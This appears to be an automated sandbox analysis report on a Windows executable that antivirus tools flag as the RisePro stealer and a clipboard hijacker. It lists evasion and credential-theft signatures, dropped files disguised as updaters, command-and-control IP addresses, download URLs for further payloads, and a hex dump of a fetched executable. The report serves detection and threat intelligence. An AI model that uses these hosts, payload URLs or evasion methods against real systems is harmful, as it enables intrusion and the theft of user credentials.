Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1426792
MD5: 5fe48966c2f11e09fd518e77118d6b1e
SHA1: 71ac5d567f1485454b0a3b04cece2d40cf8c0fa0
SHA256: f39af57919d6119847e6ecd6a9495fd0b0996a95b0bdf1d2440b6d6f296b1d18
Tags: exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Contains functionality to implement multi-threaded time evasion
Contains functionality to inject threads in other processes
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Multi AV Scanner detection for domain / URL
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Virustotal: Detection: 80% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 23%
Source: file.exe Virustotal: Detection: 30% Perma Link
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, file.exe, 00000000.00000002.4535204352.000000000059F000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004DB1CB FindFirstFileExW,GetLastError, 0_2_004DB1CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 0_2_0040B300
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CB2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_063CB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06402EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06402EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641CCFD FindFirstFileExW, 0_2_0641CCFD

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.6:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.6:49706
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.6:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.6:49706 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.6:49709 -> 193.233.132.175:80
Source: Traffic Snort IDS: 2049660 ET TROJAN RisePro CnC Activity (Outbound) 193.233.132.47:50500 -> 192.168.2.6:49706
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.6:49715
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49706 -> 193.233.132.47:50500
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Tue, 16 Apr 2024 14:23:25 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 22 Mar 2024 10:03:28 GMTConnection: keep-aliveETag: "65fd5770-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041E220 recv,setsockopt,recv,WSAGetLastError,recv,recv,setsockopt,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep, 0_2_0041E220
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: file.exe, 00000000.00000002.4548516421.0000000005D30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, 00000000.00000002.4548516421.0000000005D83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exeg
Source: file.exe, 00000000.00000003.3589404399.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exeia
Source: file.exe, 00000000.00000002.4548516421.0000000005D83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exey
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp, VkHLTH_m2kErRb6vpA5n.exe, 0000000A.00000003.2493343977.0000000002826000.00000004.00000020.00020000.00000000.sdmp, IQUKpYR1BFFsqw1YWBOv.exe, 00000016.00000003.2543316462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000017.00000003.2553704031.0000000002888000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 0000001D.00000003.2598675933.0000000002B98000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000020.00000003.2682530694.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe, 00000023.00000003.2776335477.0000000002822000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.10.dr, IQUKpYR1BFFsqw1YWBOv.exe.0.dr, MSIUpdaterV2.exe0.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000002.4533245156.0000000000515000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: file.exe, 00000000.00000003.2382096790.0000000005D84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2383586785.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, itwYrTLtu21UWeb Data.0.dr, huOuGcbbeYhHWeb Data.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
